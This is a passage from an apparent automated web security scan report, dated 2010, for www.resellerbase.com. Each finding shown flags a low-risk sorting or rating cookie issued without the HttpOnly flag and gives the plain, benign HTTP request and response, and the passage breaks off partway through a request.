4.5. http://www.resellerbase.com/adult/media-chat/more2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/more2.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /adult/media-chat/more2.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/more2.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:30:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /adult/media-chat/more2.html
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.6. http://www.resellerbase.com/adult/media-chat/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:31:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.7. http://www.resellerbase.com/adult/more2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/more2.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /adult/more2.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/more2.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:33:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /adult/more2.html
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.8. http://www.resellerbase.com/adult/personals-dating/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /adult/personals-dating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:31:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /adult/personals-dating/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.9. http://www.resellerbase.com/adult/personals-dating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /adult/personals-dating/search.php?cat=13&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/search.php?cat=13&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:32:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /adult/personals-dating/search.php?cat=13&keyword=search...&Submit3=Search&opt=1
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.10. http://www.resellerbase.com/adult/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:34:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.11. http://www.resellerbase.com/browsepr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/browsepr.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /browsepr.php?pr=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php?pr=5
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:25:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /browsepr.php?pr=5
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.12. http://www.resellerbase.com/communication/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /communication/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:34:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /communication/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.13. http://www.resellerbase.com/communication/broadband/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /communication/broadband/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:34:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /communication/broadband/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.14. http://www.resellerbase.com/communication/broadband/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /communication/broadband/search.php?cat=15&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/search.php?cat=15&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:35:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /communication/broadband/search.php?cat=15&keyword=search...&Submit3=Search&opt=1
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.15. http://www.resellerbase.com/communication/mobile-content/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /communication/mobile-content/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:36:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /communication/mobile-content/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.16. http://www.resellerbase.com/communication/mobile-content/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /communication/mobile-content/search.php?cat=16&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/search.php?cat=16&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:37:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /communication/mobile-content/search.php?cat=16&keyword=search...&Submit3=Search&opt=1
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.17. http://www.resellerbase.com/communication/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /communication/search.php?cat=8&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/search.php?cat=8&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:39:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /communication/search.php?cat=8&keyword=search...&Submit3=Search&opt=1
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.18. http://www.resellerbase.com/detail/10/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:02:35 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:02:35 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/10/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=10&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:02:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:02:35 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:02:35 GMT; path=/
Location: /detail/10/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.19. http://www.resellerbase.com/detail/11/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:14:52 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:14:52 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/11/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=11&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:14:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:14:52 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:14:52 GMT; path=/
Location: /detail/11/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.20. http://www.resellerbase.com/detail/12/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:17:00 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:17:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/12/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=12&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:17:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:17:00 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:17:00 GMT; path=/
Location: /detail/12/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.21. http://www.resellerbase.com/detail/13/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:23:04 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:23:04 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/13/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/hostgator-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=13&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:23:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:23:04 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:23:04 GMT; path=/
Location: /detail/13/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.22. http://www.resellerbase.com/detail/14/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:06:22 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:06:22 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/14/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=14&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:06:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:06:22 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:06:22 GMT; path=/
Location: /detail/14/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.23. http://www.resellerbase.com/detail/15/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:19:58 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:19:58 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/15/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=15&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:19:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:19:58 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:19:58 GMT; path=/
Location: /detail/15/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.24. http://www.resellerbase.com/detail/16/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:13:52 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:13:52 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/16/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=16&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:13:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:13:52 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:13:52 GMT; path=/
Location: /detail/16/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.25. http://www.resellerbase.com/detail/17/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:15:47 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:15:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/17/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=17&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:15:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:15:47 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:15:47 GMT; path=/
Location: /detail/17/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.26. http://www.resellerbase.com/detail/18/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:11:45 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:11:45 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/18/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=18&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:11:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:11:45 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:11:45 GMT; path=/
Location: /detail/18/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.27. http://www.resellerbase.com/detail/19/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:12:37 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:12:37 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/19/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
